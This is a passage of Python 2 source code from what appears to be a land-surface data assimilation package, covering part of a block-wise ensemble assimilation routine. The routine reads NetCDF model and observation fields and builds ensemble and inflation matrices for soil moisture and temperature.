Teta_Residual[Soil_Layer_Index,:,:], Teta_Saturated[Soil_Layer_Index,:,:], Teta_Field_Capacity[Soil_Layer_Index,:,:], Teta_Wilting_Point[Soil_Layer_Index,:,:], NAvalue)
if Feedback_Assim: # and (string.atoi(Stop_Month) >= 4) and (string.atoi(Stop_Month) <= 10):
for Ens_Index in range(Ensemble_Number):
for Soil_Layer_Index in range(Soil_Layer_Num - 5):
Check_Outliers(DasPy_Path, Land_Mask_Data, Def_ParFor,DAS_Depends_Path,omp_get_num_procs_ParFor, CLM_Soil_Moisture_Ensemble_Mat[Soil_Layer_Index,:,:,Ens_Index], NA_Flag, "Soil_Moisture", Variable_Assimilation_Flag, Variable_List,
Teta_Residual[Soil_Layer_Index,:,:], Teta_Saturated[Soil_Layer_Index,:,:], Teta_Field_Capacity[Soil_Layer_Index,:,:], Teta_Wilting_Point[Soil_Layer_Index,:,:], NAvalue)
if Def_ReBEL_Temp == 1:
#============== Memory Collection
del Mask, Mask_Index, Mask_Copy, Mask_Index_Single_Layer, Mask_False, Obs_Grid, h, R
del Obs_Index, xa, innovation, increments, localization_map, bias_a
del xm, localization_map_col, xa_temp, parm_infl_temp
Analysis_Grid_Col = []
Innovation_State_Col = []
Increments_State_Col = []
Localization_Map_Mask_Col = []
del numexpr_a,numexpr_b,numexpr_c,NA_Index_Analysis_Grid
del pyper, Call_ReBEL_Octave, gssm_das_octave, letkf, letkf_common
del Bias_Model_Uniform_STD, Bias_Obs_Uniform_STD, Model_Inflation_Uniform_STD
gc.collect()
del gc.garbage[:]
return Analysis_Grid, Analysis_Grid_Array, Localization_Map_Mask, \
CLM_Ground_Temperature_Ensemble_Mat, CLM_Vegetation_Temperature_Ensemble_Mat, CLM_Soil_Moisture_Ensemble_Mat, CLM_Soil_Temperature_Ensemble_Mat, PF_PRESSURE_Ensemble_Mat, PF_SATURATION_Ensemble_Mat, \
Prop_Grid_Array_Sys_parm_infl, CLM_Latent_Heat_parm_infl, CLM_Surface_Temperature_parm_infl, CLM_Ground_Temperature_parm_infl, CLM_Vegetation_Temperature_parm_infl, CLM_Soil_Moisture_parm_infl, CLM_Soil_Temperature_parm_infl, PF_SATURATION_parm_infl,\
CLM_Ground_Temperature_Ensemble_Mat_Bias, CLM_Vegetation_Temperature_Ensemble_Mat_Bias, CLM_Soil_Moisture_Ensemble_Mat_Bias, CLM_Soil_Temperature_Ensemble_Mat_Bias, \
CLM_Surface_Temperature_parm_infl_Bias, CLM_Ground_Temperature_parm_infl_Bias, CLM_Vegetation_Temperature_parm_infl_Bias, CLM_Soil_Moisture_parm_infl_Bias, CLM_Soil_Temperature_parm_infl_Bias,\
Prop_Grid_Array_Bias, Observation_Bias, Prop_Grid_Array_Sys_parm_infl_Bias, Observation_parm_infl_Bias, \
Parameter_Soil_Space_Ensemble, Parameter_Soil_Space_parm_infl, Parameter_Veg_Space_Ensemble, Parameter_Veg_Space_parm_infl, Parameter_PFT_Space_Ensemble, Parameter_PFT_Space_parm_infl, \
Parameter_Hard_Space_Ensemble, Parameter_Hard_Space_parm_infl, Innovation_State, Increments_State
def Block_Assim(Block_Index, Model_Driver, Sub_Block_Index_Row_Mat_Vector, Sub_Block_Index_Col_Mat_Vector, Row_Numbers, Col_Numbers, Sub_Block_Ratio_Row, Sub_Block_Ratio_Col, Row_Offset, Col_Offset,
Row_Numbers_SubBlock_Array, Col_Numbers_SubBlock_Array, Sub_Block_Row_Start_Array, Sub_Block_Row_End_Array, Sub_Block_Col_Start_Array, Sub_Block_Col_End_Array,
Start_Month, Stop_Month, Stop_Day, Stop_Hour, UTC_Zone, MODEL_X_Left, MODEL_X_Right, MODEL_Y_Lower, MODEL_Y_Upper, Ensemble_Number, Prop_Grid_Array_Sys_Index,
Dim_Observation_Quantity, SensorQuantity_Index, Observation_Box, Model_State_Inflation_Range, Model_State_Inflation_Range_STD,
Model_Bias_Range, Observation_Bias_Range, Model_Bias_Range_STD, Observation_Bias_Range_STD, Model_Bias_STD, Observation_Bias_STD,
Variable_List, Observation_Matrix_Index, Soil_Layer_Num, ParFlow_Layer_Num, SensorVariable_Sub, SensorType_Sub, SensorQuantity_Sub, SensorResolution_Sub,
Variable_Assimilation_Flag, Soil_Layer_Index_DA, Feedback_Assim, Parameter_Optimization_Flag, Soil_Par_Sens, Veg_Par_Sens, PFT_Par_Sens, Hard_Par_Sens, Dim_CLM_State, maxpft, Normal_Score_Trans, PDAF_Assim_Framework, PDAF_Filter_Type,
Def_First_Run, Def_Print, Def_PP, Def_Multiresolution, Def_ReBEL, Def_Localization, Num_Local_Obs, eps, msw_infl, Post_Inflation_Alpha, Def_ParFor, Ensemble_Number_Predict,
Call_Gstat_Flag, diskless_flag, persist_flag, Assim_Algorithm_Name, Proj_String, Z_Resolution, Observation_X_Left, Observation_X_Right, Observation_Y_Lower, Observation_Y_Upper,
Grid_Resolution_CEA, Write_DA_File_Flag, Datetime_Start, Datetime_Stop, Datetime_Stop_Init, Datetime_Initial, Region_Name, NSLOTS,
Observation_Corelation_Par, Bias_Estimation_Option_Model, Bias_Estimation_Option_Obs, Low_Ratio_Par, High_Ratio_Par,
Dim_Soil_Par, Dim_Veg_Par, Dim_PFT_Par, Dim_Hard_Par, Soil_Par_Sens_Dim, Veg_Par_Sens_Dim, PFT_Par_Sens_Dim, Hard_Par_Sens_Dim, Soil_Texture_Layer_Opt_Num, Soil_Sand_Clay_Sum,
Parameter_Range_Soil, Parameter_Range_Veg, Parameter_Range_PFT, Parameter_Range_Hard, Parameter_Regularization, Par_Soil_Uniform_STD, Par_Veg_Uniform_STD, Par_PFT_Uniform_STD, Par_Hard_Uniform_STD, DateString_Plot,
DAS_Depends_Path, DasPy_Path, CLM_NA, NAvalue, omp_get_num_procs_ParFor, Def_CDF_Matching, Plot_Analysis, NC_FileName_Assimilation_2_Constant, NC_FileName_Assimilation_2_Diagnostic, NC_FileName_Assimilation_2_Initial,
NC_FileName_Assimilation_2_Bias, NC_FileName_Assimilation_2_Parameter, NC_FileName_Parameter_Space_Single, DAS_Output_Path, *vartuple):
NC_FileName_Block_Assim_Common = DAS_Output_Path+"Analysis/"+Region_Name+"/Block_Assim_Common.nc"
if Def_Print:
print 'Read NetCDF File:',NC_FileName_Block_Assim_Common
NC_File_Block_Assim_Common = netCDF4.Dataset(NC_FileName_Block_Assim_Common, 'r')
Mask_Sub = NC_File_Block_Assim_Common.variables['Mask_Sub'][:,:,:]
Mask_Index_Sub_NC = NC_File_Block_Assim_Common.variables['Mask_Index_Sub'][:,:]
Model_Variance = NC_File_Block_Assim_Common.variables['Model_Variance'][:,:,:]
Observation_Variance = NC_File_Block_Assim_Common.variables['Observation_Variance'][:,:,:]
Observation_Latitude = NC_File_Block_Assim_Common.variables['Observation_Latitude'][:,:,:]
Observation_Longitude = NC_File_Block_Assim_Common.variables['Observation_Longitude'][:,:,:]
Observation_Matrix = NC_File_Block_Assim_Common.variables['Observation_Matrix'][:,:,:]
NC_File_Block_Assim_Common.close()
Mask_Index_Sub = numpy.zeros_like(Mask_Index_Sub_NC,dtype=numpy.bool)
numexpr_a = Mask_Index_Sub_NC
numexpr_b = 0.0
numexpr_c = numpy.where(numexpr_a == numexpr_b)
Mask_Index_Sub[numexpr_c] = False
numexpr_a = Mask_Index_Sub_NC
numexpr_b = 1.0
numexpr_c = numpy.where(numexpr_a == numexpr_b)
Mask_Index_Sub[numexpr_c] = True
#print Mask_Index_Sub
#print "Teta_Residual",Teta_Residual
#print "Teta_Saturated",Teta_Saturated
#os.abort()
Sub_Block_Index_Row = Sub_Block_Index_Row_Mat_Vector[Block_Index]
Sub_Block_Index_Col = Sub_Block_Index_Col_Mat_Vector[Block_Index]
# Run Data Assimilation
Row_Numbers_SubBlock = Row_Numbers_SubBlock_Array[Block_Index]
Col_Numbers_SubBlock = Col_Numbers_SubBlock_Array[Block_Index]
# We define two boundary box for sub block assimilation: use big box to do assimilation, use small box to select the assimilation results to keep smooth
# This is the box to select the assimilation results (small)
Sub_Block_Row_Start = Sub_Block_Row_Start_Array[Block_Index]
Sub_Block_Row_End = Sub_Block_Row_End_Array[Block_Index]
Sub_Block_Col_Start = Sub_Block_Col_Start_Array[Block_Index]
Sub_Block_Col_End = Sub_Block_Col_End_Array[Block_Index]
if Def_Print:
print "Sub_Block_Row_Start, Sub_Block_Row_End, Sub_Block_Col_Start, Sub_Block_Col_End",Sub_Block_Row_Start, Sub_Block_Row_End, Sub_Block_Col_Start, Sub_Block_Col_End
# This is the box to select the states for assimilation (big)
Observation_Box_Row_Index_Start = max([Sub_Block_Row_Start - Observation_Box, 0])
Observation_Box_Row_Index_End = min([Sub_Block_Row_End + Observation_Box, Row_Numbers])
Observation_Box_Col_Index_Start = max([Sub_Block_Col_Start - Observation_Box, 0])
Observation_Box_Col_Index_End = min([Sub_Block_Col_End + Observation_Box, Col_Numbers])
Observation_NLats_SubBlock = int(Observation_Box_Row_Index_End - Observation_Box_Row_Index_Start)
Observation_NLons_SubBlock = int(Observation_Box_Col_Index_End - Observation_Box_Col_Index_Start)
if Def_Print:
print "Observation_Box_Row_Index_Start,Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start,Observation_Box_Col_Index_End",Observation_Box_Row_Index_Start,Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start,Observation_Box_Col_Index_End
X_Left_SubBlock = MODEL_X_Left + Sub_Block_Index_Col * Observation_NLons_SubBlock * Grid_Resolution_CEA
X_Right_SubBlock = MODEL_X_Right - (Sub_Block_Ratio_Col - Sub_Block_Index_Col - 1) * Observation_NLons_SubBlock * Grid_Resolution_CEA
Y_Lower_SubBlock = MODEL_Y_Lower + (Sub_Block_Ratio_Row - Sub_Block_Index_Row - 1) * Observation_NLats_SubBlock * Grid_Resolution_CEA
Y_Upper_SubBlock = MODEL_Y_Upper - Sub_Block_Index_Row * Observation_NLats_SubBlock * Grid_Resolution_CEA
NC_File_Out_Assimilation_2_Constant = netCDF4.Dataset(NC_FileName_Assimilation_2_Constant, 'r')
NC_File_Out_Assimilation_2_Initial = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial, 'r')
NC_File_Out_Assimilation_2_Diagnostic = netCDF4.Dataset(NC_FileName_Assimilation_2_Diagnostic, 'r')
#print numpy.shape(Prop_Grid_Array_Sys[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End])
Prop_Grid_Array_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['Prop_Grid_Array_Sys'][:, Prop_Grid_Array_Sys_Index, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Prop_Grid_Array_H_Trans_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['Prop_Grid_Array_H_Trans'][:, Prop_Grid_Array_Sys_Index, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Model_State_SubBlock = numpy.mean(NC_File_Out_Assimilation_2_Initial.variables['Prop_Grid_Array_Sys'][:, Prop_Grid_Array_Sys_Index, :, :],axis=0)[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Model_Variance_SubBlock = Model_Variance[Prop_Grid_Array_Sys_Index, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Mask_SubBlock = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock, 3),dtype=numpy.float32)
Mask_SubBlock[:, 0] = Mask_Sub[0, ::][Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End].flatten()
Mask_SubBlock[:, 1] = Mask_Sub[1, ::][Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End].flatten()
Mask_SubBlock[:, 2] = Mask_Sub[2, ::][Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End].flatten()
Mask_Index_SubBlock = Mask_Index_Sub[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End].flatten()
Land_Mask_Data_SubBlock = NC_File_Out_Assimilation_2_Constant.variables['Land_Mask_Data'][Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
if Def_Print >= 2:
print "numpy.size(numpy.where(Mask_Index_SubBlock == False))",numpy.size(numpy.where(Mask_Index_SubBlock == False))
if SensorVariable_Sub == "Soil_Moisture":
Soil_Layer_Thickness_Ratio = numpy.asarray(NC_File_Out_Assimilation_2_Constant.variables['Soil_Layer_Thickness_Ratio_Moisture'][:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End])
else:
Soil_Layer_Thickness_Ratio = numpy.asarray(NC_File_Out_Assimilation_2_Constant.variables['Soil_Layer_Thickness_Ratio_Temperature'][:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End])
NC_File_Out_Assimilation_2_Diagnostic.close()
NC_File_Out_Assimilation_2_Initial.close()
NC_File_Out_Assimilation_2_Constant.close()
Analysis_Grid_SubBlock = numpy.zeros((Observation_NLats_SubBlock, Observation_NLons_SubBlock),dtype=numpy.float32)
Analysis_Grid_Array_SubBlock = numpy.zeros((Ensemble_Number, Observation_NLats_SubBlock, Observation_NLons_SubBlock),dtype=numpy.float32)
Localization_Map_Mask_SubBlock = numpy.zeros((Observation_NLats_SubBlock, Observation_NLons_SubBlock),dtype=numpy.float32)
Innovation_State_SubBlock = numpy.zeros((Ensemble_Number, Observation_NLats_SubBlock, Observation_NLons_SubBlock),dtype=numpy.float32)
Increments_State_SubBlock = numpy.zeros((Ensemble_Number, Observation_NLats_SubBlock, Observation_NLons_SubBlock),dtype=numpy.float32)
Mask_SubBlock_Row = numpy.shape(Mask_SubBlock)[0]
if Mask_SubBlock_Row == 0:
# Compose the Full Analysis Grid
Analysis_Grid_SubBlock = numpy.mean(Prop_Grid_Array_SubBlock, axis=0)
for Ens_Index in range(Ensemble_Number):
Analysis_Grid_Array_SubBlock[Ens_Index,:,:] = Prop_Grid_Array_SubBlock[Ens_Index, :, :]
else:
Observation_Variance_SubBlock = Observation_Variance[Observation_Matrix_Index,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Observation_Longitude_SubBlock = Observation_Longitude[Observation_Matrix_Index,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Observation_Latitude_SubBlock = Observation_Latitude[Observation_Matrix_Index,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Observation_Matrix_SubBlock = Observation_Matrix[Observation_Matrix_Index,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
numexpr_a = Mask_Index_Sub[Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
numexpr_b = True
numexpr_c = numpy.where(numexpr_a == numexpr_b)
Observation_Matrix_SubBlock[numexpr_c] = NAvalue
# Observation_Variance_SubBlock = Observation_Variance[Observation_Matrix_Index,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End]
# Observation_Longitude_SubBlock = Observation_Longitude[Observation_Matrix_Index,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End]
# Observation_Latitude_SubBlock = Observation_Latitude[Observation_Matrix_Index,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End]
# Observation_Matrix_SubBlock = Observation_Matrix[Observation_Matrix_Index,Sub_Block_Row_Start:Sub_Block_Row_End,Sub_Block_Col_Start:Sub_Block_Col_End]
if Plot_Analysis >= 2:
import matplotlib
# Force matplotlib to not use any Xwindows backend.
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.cm as cm
import matplotlib.colors as colors
from mpl_toolkits.axes_grid.inset_locator import inset_axes
Observation_Matrix_SubBlock_Masked = numpy.ma.masked_values(Observation_Matrix_SubBlock, NAvalue)
w, h = plt.figaspect(float(Row_Numbers) / Col_Numbers)
Variable_Min = numpy.min(Observation_Matrix_SubBlock_Masked)
Variable_Max = numpy.max(Observation_Matrix_SubBlock_Masked)
ticks = numpy.arange(Variable_Min, Variable_Max, (Variable_Max - Variable_Min) / 5.0)
color_boun_list = []
color_bound = [Variable_Min, Variable_Max, (Variable_Max - Variable_Min) / 100.0]
for i in range(int((color_bound[1] - color_bound[0]) / color_bound[2])):
color_bound[0] += color_bound[2]
color_boun_list.append(color_bound[0])
fig1 = plt.figure(figsize=(w*2, h*2), dpi=80)
fig1.suptitle(DateString_Plot, fontsize=16)
ax = fig1.add_subplot(1, 1, 1)
im1 = ax.imshow(Observation_Matrix_SubBlock_Masked, cmap=cm.jet, norm=colors.BoundaryNorm(color_boun_list, ncolors=300))
plt.colorbar(im1, ticks=ticks, orientation='horizontal')
ax.set_title('Observation_Matrix_SubBlock')
plt.grid(True)
plt.savefig(DasPy_Path+"Analysis/DAS_Temp/"+Region_Name+"_"+DateString_Plot+"/Observation_Matrix_SubBlock.png")
plt.close('all')
NC_File_Out_Assimilation_2_Constant = netCDF4.Dataset(NC_FileName_Assimilation_2_Constant, 'r')
NC_File_Out_Assimilation_2_Initial = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial, 'r')
NC_File_Out_Assimilation_2_Diagnostic = netCDF4.Dataset(NC_FileName_Assimilation_2_Diagnostic, 'r')
Teta_Residual_SubBlock = NC_File_Out_Assimilation_2_Constant.variables['Teta_Residual'][:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Teta_Saturated_SubBlock = NC_File_Out_Assimilation_2_Constant.variables['Teta_Saturated'][:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Teta_Field_Capacity_SubBlock = NC_File_Out_Assimilation_2_Constant.variables['Teta_Field_Capacity'][:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Teta_Wilting_Point_SubBlock = NC_File_Out_Assimilation_2_Constant.variables['Teta_Wilting_Point'][:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
CLM_Ground_Temperature_Ensemble_Mat_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['CLM_Ground_Temperature_Ensemble_Mat'][Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End, :]
CLM_Vegetation_Temperature_Ensemble_Mat_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['CLM_Vegetation_Temperature_Ensemble_Mat'][Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End, :]
CLM_Soil_Moisture_Ensemble_Mat_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Moisture_Ensemble_Mat'][:, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End, :]
CLM_Soil_Temperature_Ensemble_Mat_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Temperature_Ensemble_Mat'][:, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End, :]
NC_File_Out_Assimilation_2_Diagnostic.close()
NC_File_Out_Assimilation_2_Initial.close()
NC_File_Out_Assimilation_2_Constant.close()
Prop_Grid_Array_Bias_SubBlock = []
CLM_Ground_Temperature_Ensemble_Mat_Bias_SubBlock = []
CLM_Vegetation_Temperature_Ensemble_Mat_Bias_SubBlock = []
CLM_Soil_Moisture_Ensemble_Mat_Bias_SubBlock = []
CLM_Soil_Temperature_Ensemble_Mat_Bias_SubBlock = []
Observation_Bias_SubBlock = []
NC_File_Out_Assimilation_2_Parameter = netCDF4.Dataset(NC_FileName_Assimilation_2_Parameter, 'r')
if Soil_Par_Sens_Dim >= 1:
Parameter_Soil_Space_Ensemble_SubBlock = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_Soil_Space_Ensemble'][:, :, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Parameter_Soil_Space_parm_infl_SubBlock = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_Soil_Space_parm_infl'][:, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
else:
Parameter_Soil_Space_Ensemble_SubBlock = []
Parameter_Soil_Space_parm_infl_SubBlock = []
Parameter_Veg_Space_Ensemble_SubBlock = []
Parameter_Veg_Space_parm_infl_SubBlock = []
if PFT_Par_Sens_Dim >= 1:
Parameter_PFT_Space_Ensemble_SubBlock = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_PFT_Space_Ensemble'][:,:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
Parameter_PFT_Space_parm_infl_SubBlock = NC_File_Out_Assimilation_2_Parameter.variables['Parameter_PFT_Space_parm_infl'][:,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
else:
Parameter_PFT_Space_Ensemble_SubBlock = []
Parameter_PFT_Space_parm_infl_SubBlock = []
Parameter_Hard_Space_Ensemble_SubBlock = []
Parameter_Hard_Space_parm_infl_SubBlock = []
Saturation_SSat_SubBlock = []
Saturation_SRes_SubBlock = []
Saturation_N_SubBlock = []
Saturation_Alpha_SubBlock = []
NC_File_Out_Assimilation_2_Parameter.close()
NC_File_Out_Assimilation_2_Initial = netCDF4.Dataset(NC_FileName_Assimilation_2_Initial, 'r')
Prop_Grid_Array_Sys_parm_infl_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['Prop_Grid_Array_Sys_parm_infl'][Prop_Grid_Array_Sys_Index,Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
CLM_Surface_Temperature_parm_infl_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['CLM_Surface_Temperature_parm_infl'][Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
CLM_Ground_Temperature_parm_infl_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['CLM_Ground_Temperature_parm_infl'][Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
CLM_Vegetation_Temperature_parm_infl_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['CLM_Vegetation_Temperature_parm_infl'][Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
CLM_Soil_Moisture_parm_infl_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Moisture_parm_infl'][:, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
CLM_Soil_Temperature_parm_infl_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Temperature_parm_infl'][:, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
# dominik29/06/2016 read other variable into latent_heat to ommit error, assuming variable is not important
CLM_Latent_Heat_parm_infl_SubBlock = NC_File_Out_Assimilation_2_Initial.variables['CLM_Soil_Temperature_parm_infl'][:, Observation_Box_Row_Index_Start:Observation_Box_Row_Index_End, Observation_Box_Col_Index_Start:Observation_Box_Col_Index_End]
NC_File_Out_Assimilation_2_Initial.close()
Prop_Grid_Array_Sys_parm_infl_Bias_SubBlock = []
CLM_Surface_Temperature_parm_infl_Bias_SubBlock = []
CLM_Ground_Temperature_parm_infl_Bias_SubBlock = []
CLM_Vegetation_Temperature_parm_infl_Bias_SubBlock = []
CLM_Soil_Moisture_parm_infl_Bias_SubBlock = []
CLM_Soil_Temperature_parm_infl_Bias_SubBlock = []
Observation_parm_infl_Bias_SubBlock = []
# Build the ensemble state matrix (E0_SysModel) and the predicted-observation
# matrix (E0_ObsModel): one column per ensemble member, one row per grid cell
# of the observation sub-block, then drop the masked-out cells.
if Def_Print:
print "---------------------- Prepare the Model Ensemble Grid for Bayesian Filtering DA -------------------"
E0_SysModel_SubBlock = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock, Ensemble_Number),dtype=numpy.float32)
E0_ObsModel_SubBlock = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock, Ensemble_Number),dtype=numpy.float32)
for Ens_Index in range(Ensemble_Number):
# Flatten each member's 2-D sub-block grid into one column vector.
E0_SysModel_SubBlock[:, Ens_Index] = Prop_Grid_Array_SubBlock[Ens_Index, :, :].flatten()
#print Prop_Grid_Array_H_Trans[:, Prop_Grid_Array_Sys_Index, Row_Index,Col_Index]
E0_ObsModel_SubBlock[:, Ens_Index] = Prop_Grid_Array_H_Trans_SubBlock[Ens_Index, :, :].flatten()
########################################################################################################################################
# Mask_Index_SubBlock flags invalid cells, so its negation selects the
# cells that enter the filter (presumably a boolean array — TODO confirm).
Mask_Index_Vector = ~Mask_Index_SubBlock
E0_SysModel_SubBlock = E0_SysModel_SubBlock[Mask_Index_Vector, 0:Ensemble_Number]
E0_ObsModel_SubBlock = E0_ObsModel_SubBlock[Mask_Index_Vector, 0:Ensemble_Number]
#print E0_ObsMode
# Allocate flattened (1-D over the sub-block grid) inflation vectors and
# per-variable ensemble matrices, then copy the sub-block inflation fields
# read above into the flattened vectors.
Parameter_Min_Max = numpy.zeros((Dim_Soil_Par,2))
# NOTE(review): this numpy allocation of parm_infl is discarded — parm_infl
# is reassigned to [] a few lines below and rebuilt per variable.
parm_infl = numpy.zeros(Observation_NLats_SubBlock * Observation_NLons_SubBlock,dtype=numpy.float32)
Prop_Grid_Array_Sys_parm_infl = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock),dtype=numpy.float32)
CLM_Soil_Moisture_parm_infl = numpy.zeros((Soil_Layer_Num, Observation_NLats_SubBlock * Observation_NLons_SubBlock),dtype=numpy.float32)
CLM_Soil_Temperature_parm_infl = numpy.zeros((Soil_Layer_Num, Observation_NLats_SubBlock * Observation_NLons_SubBlock),dtype=numpy.float32)
CLM_Surface_Temperature_parm_infl = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock),dtype=numpy.float32)
CLM_Ground_Temperature_parm_infl = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock),dtype=numpy.float32)
CLM_Vegetation_Temperature_parm_infl = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock),dtype=numpy.float32)
CLM_Latent_Heat_parm_infl = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock),dtype=numpy.float32)
CLM_Sensible_Heat_parm_infl = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock),dtype=numpy.float32)
# Ensemble matrices: (soil layers x) grid cells x ensemble members.
CLM_Soil_Moisture_Ensemble = numpy.zeros((Soil_Layer_Num, Observation_NLats_SubBlock * Observation_NLons_SubBlock, Ensemble_Number),dtype=numpy.float32)
CLM_Soil_Temperature_Ensemble = numpy.zeros((Soil_Layer_Num, Observation_NLats_SubBlock * Observation_NLons_SubBlock, Ensemble_Number),dtype=numpy.float32)
CLM_Surface_Temperature_Ensemble = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock, Ensemble_Number),dtype=numpy.float32)
CLM_Ground_Temperature_Ensemble = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock, Ensemble_Number),dtype=numpy.float32)
CLM_Vegetation_Temperature_Ensemble = numpy.zeros((Observation_NLats_SubBlock * Observation_NLons_SubBlock, Ensemble_Number),dtype=numpy.float32)
# Flatten the 2-D (and per-layer) inflation sub-blocks into the 1-D vectors.
Prop_Grid_Array_Sys_parm_infl[:] = Prop_Grid_Array_Sys_parm_infl_SubBlock[:, :].flatten()
for Soil_Layer_Index in range(Soil_Layer_Num):
CLM_Soil_Moisture_parm_infl[Soil_Layer_Index,:] = CLM_Soil_Moisture_parm_infl_SubBlock[Soil_Layer_Index,:, :].flatten()
CLM_Soil_Temperature_parm_infl[Soil_Layer_Index,:] = CLM_Soil_Temperature_parm_infl_SubBlock[Soil_Layer_Index,:, :].flatten()
CLM_Surface_Temperature_parm_infl[:] = CLM_Surface_Temperature_parm_infl_SubBlock[:, :].flatten()
CLM_Ground_Temperature_parm_infl[:] = CLM_Ground_Temperature_parm_infl_SubBlock[:, :].flatten()
CLM_Vegetation_Temperature_parm_infl[:] = CLM_Vegetation_Temperature_parm_infl_SubBlock[:, :].flatten()
# Reset parm_infl (rebuilt below per assimilated variable) and the full-name
